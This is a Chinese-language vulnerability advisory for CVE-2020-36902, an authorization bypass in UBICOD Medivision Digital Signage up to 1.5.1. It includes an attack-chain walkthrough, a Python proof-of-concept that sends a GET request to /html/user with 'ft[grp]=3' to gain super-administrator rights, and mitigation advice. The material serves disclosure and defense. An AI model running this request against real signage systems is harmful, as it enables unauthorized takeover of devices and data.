CVE-2020-36902 UBICOD Medivision Digital Signage 授权绕过漏洞

漏洞信息

漏洞编号

CVE-2020-36902

漏洞类型

授权绕过

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

UBICOD Medivision Digital Signage

漏洞概述

CVE-2020-36902是UBICOD Medivision Digital Signage 1.5.1版本中存在的一个严重授权绕过漏洞。该漏洞允许未经认证的普通用户通过操纵HTTP请求中的'ft[grp]'参数，将权限提升为超级管理员。攻击者只需发送一个简单的GET请求，在请求参数中包含'ft[grp]=3'即可绕过权限检查，获得系统最高权限。由于该漏洞无需认证即可利用，且CVSS评分高达9.8，属于紧急安全漏洞。成功利用此漏洞的攻击者可以完全控制受影响的数字标牌系统，访问敏感数据，修改系统配置，甚至可能将攻击横向扩展到内网其他系统。该漏洞影响所有使用该版本的组织，需要立即采取修复措施。

技术细节

该漏洞源于Medivision Digital Signage应用对用户权限验证的不完善。在用户权限管理模块中，系统使用'ft[grp]'参数来标识用户所属的用户组，进而决定用户的访问权限。正常情况下，值为1表示普通用户组，值为3表示超级管理员组。漏洞在于应用仅在客户端进行权限校验，或在服务端校验时使用了可被篡改的参数值。攻击者可以通过构造恶意GET请求，在访问/html/user端点时，将'ft[grp]'参数设置为整数值'3'，应用将错误地认为该用户具有超级管理员权限，从而返回管理员功能的访问权限。攻击者无需事先获取任何有效凭证即可发起此攻击，这使得漏洞的利用门槛极低且危害极大。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统，确认目标运行UBICOD Medivision Digital Signage应用

STEP 2

步骤2

攻击者构造恶意GET请求，访问/html/user端点

STEP 3

步骤3

在请求参数中添加'ft[grp]=3'，将用户组标识设置为超级管理员组

STEP 4

步骤4

应用错误地验证用户权限，将攻击者视为超级管理员

STEP 5

步骤5

攻击者获得完整的管理员权限，可访问敏感数据、修改系统配置或执行恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2020-36902 PoC - UBICOD Medivision Digital Signage Authorization Bypass
# Target: UBICOD Medivision Digital Signage <= 1.5.1
# Vulnerability: Privilege escalation via ft[grp] parameter manipulation

target_url = "http://target.com/html/user"

# Normal user access with manipulated ft[grp] parameter set to 3 (super admin)
payload = {
    "ft[grp]": "3"  # Set to 3 for super admin privileges
}

print("[*] Attempting privilege escalation...")
print(f"[*] Target: {target_url}")
print(f"[*] Payload: {payload}")

try:
    response = requests.get(target_url, params=payload, timeout=10)
    
    print(f"[*] Status Code: {response.status_code}")
    
    # Check for signs of successful privilege escalation
    if response.status_code == 200:
        if "admin" in response.text.lower() or "super" in response.text.lower():
            print("[+] SUCCESS: Privilege escalation detected!")
            print("[+] Super admin access may have been obtained")
        else:
            print("[*] Response received, check manually for admin access")
    else:
        print(f"[-] Request failed with status: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

UBICOD Medivision Digital Signage <= 1.5.1

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 使用Web应用防火墙(WAF)规则阻止包含'ft[grp]'参数的异常请求；2) 限制对/html/user端点的网络访问，仅允许受信任的IP地址访问；3) 临时关闭系统并切换到备用数字标牌解决方案；4) 实施双因素认证机制以增加额外的安全层；5) 监控日志中的异常访问模式，及时发现潜在的利用行为。